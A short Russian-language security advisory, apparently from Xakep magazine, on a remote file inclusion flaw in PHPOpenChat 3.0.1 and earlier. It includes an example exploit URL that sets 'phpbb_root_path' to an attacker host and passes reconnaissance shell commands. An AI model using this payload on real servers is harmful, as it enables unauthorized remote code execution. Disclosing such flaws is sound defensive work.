Хакер #305. Многошаговые SQL-инъекции
Программа: PHPOpenChat 3.0.1 и более ранние версии
Уязвимость позволяет удаленному
пользователю выполнить произвольный php-сценарий
на уязвимой системе.
Уязвимость существует в сценарии /phpopenchat/contrib/phpbb/
alternative2/phpBB2_root/poc_loginform.php из-за некорректной
обработки входных данных в переменной 'phpbb_root_path'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольные команды на системе с
привилегиями web сервера.
Пример:
http://[target]/phpopenchat/contrib/phpbb/alternative2/ phpBB2_root poc_login
form.php?phpbb_root_path=http://[attacker]/ asc?&cmd=uname%20-a;w;id;pwd;ps
Также уязвимы сценарии /contrib/phpbb/poc.php,/contrib/phpnuke/ENGLISH_poc.php,
/contrib/phpnuke/poc.php, и /contrib/yabbse/poc.php. Для удачной
эксплуатации уязвимости опции register_globals и
allow_url_fopen должны быть включены на целевой
системе.